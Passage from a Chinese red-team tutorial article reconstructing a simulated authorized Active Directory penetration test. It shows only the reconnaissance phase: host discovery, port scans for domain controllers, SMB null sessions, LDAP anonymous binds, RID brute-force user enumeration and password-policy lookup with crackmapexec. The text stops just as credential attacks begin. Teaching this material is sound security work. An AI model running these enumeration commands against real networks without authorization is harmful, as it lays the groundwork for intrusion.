2026-04-26 05:07:48 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文模拟了一次完整的AD域渗透测试过程，从零开始通过ARP扫描、端口扫描识别域控和网络结构，利用LDAP匿名绑定和SMB空会话收集域用户信息，结合Responder和密码喷洒获取初始凭据，最终通过Kerberoasting和DCSync攻击逐步提升权限至DomainAdmin。文章基于实战经验构建典型攻击链，并关联系列技术文章供细节回溯。 综合评分： 85 文章分类： 渗透测试,内网渗透,红队,WEB安全,实战经验

cover_image

从网线到域控：一次完整AD渗透的全流程复盘

原创

极客零零七极客零零七

极客零零七

2026年4月25日 09:34 加拿大

在小说阅读器读本章

去阅读

极客零零七 · AD攻击系列 · 第11篇（完结篇）

前10篇文章，每篇聚焦一个技术点。本篇把所有技术串成一条完整的攻击链——模拟一次从零开始到拿下整个AD域的完整渗透测试过程。

这不是某一次真实渗透的复述，而是基于大量实战经验构建的典型攻击路径。每一步都注明对应本系列的哪篇文章，方便回溯细节。

零、任务背景

目标：某中型企业（约1500员工），已签署渗透测试授权书。范围：内网AD域全覆盖，目标是获取Domain Admin权限并证明对核心资产的访问能力。

起点：攻击者已接入企业内网（模拟恶意内部人员或物理突破），拥有一台Kali Linux攻击机，IP地址通过DHCP获取。

手里什么都没有——没有用户名，没有密码，没有域名。

阶段一：网络侦察与信息收集（第1篇）

目标：搞清楚面前的网络是什么样的

## 1. ARP扫描发现存活主机sudo arp-scan -l
## 结果：发现 10.10.10.0/24 网段有约80台主机存活## 10.10.10.1 看起来是网关## 10.10.10.10, 10.10.10.11 有多个端口响应

## 2. 针对性端口扫描——寻找域控nmap -sV -p 53,88,135,139,389,445,636,3268,5985 10.10.10.0/24 -oA scan_results
## 关键发现：## 10.10.10.10 - 端口88(Kerberos), 389(LDAP), 636(LDAPS), 3268(GC) 全开 → 域控DC01## 10.10.10.11 - 同样 → 域控DC02## 10.10.10.20 - 端口80,443,445 → Web服务器## 10.10.10.30 - 端口445,1433 → SQL服务器## 10.10.10.40-60 - 端口445 → 工作站群

## 3. 确认域名crackmapexec smb 10.10.10.10## SMB10.10.10.10445DC01[*]WindowsServer2019Build17763 x64## SMB &nbsp; &nbsp;10.10.10.10 &nbsp;445 &nbsp;DC01 &nbsp;[*] domain:MEGACORP signing:True SMBv1:False## 域名：MEGACORP.LOCAL

## 4. 无认证信息收集## LDAP匿名绑定ldapsearch -H ldap://10.10.10.10 -x -s base namingContexts## 成功！返回 DC=megacorp,DC=local
## SMB空会话crackmapexec smb 10.10.10.10 -u&nbsp;''&nbsp;-p&nbsp;''&nbsp;--shares## 空会话可用！发现几个共享：NETLOGON, SYSVOL, IT-Share（可读）
## RID爆破枚举用户crackmapexec smb 10.10.10.10 -u&nbsp;''&nbsp;-p&nbsp;''&nbsp;--rid-brute 2000## 成功！枚举出约200个域用户

## 5. 密码策略crackmapexec smb 10.10.10.10 -u&nbsp;''&nbsp;-p&nbsp;''&nbsp;--pass-pol## [*] Minimum password length: 8## [*] Account lockout threshold: 5## [*] Account lockout duration: 30 minutes## [*] Reset account lockout counter after: 30 minutes

信息收集阶段收获：

域名：MEGACORP.LOCAL
2台域控：DC01(10.10.10.10)、DC02(10.10.10.11)
约200个用户名
密码策略：5次锁定，30分钟窗口
1台Web服务器、1台SQL服务器
IT-Share共享可匿名读取

用时：约30分钟

阶段二：获取初始凭据（第1篇）

多管齐下：Responder + 密码喷洒 + 共享搜索

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：极客零零七极客零零七极客零零七《从网线到域控：一次完整AD渗透的全流程复盘》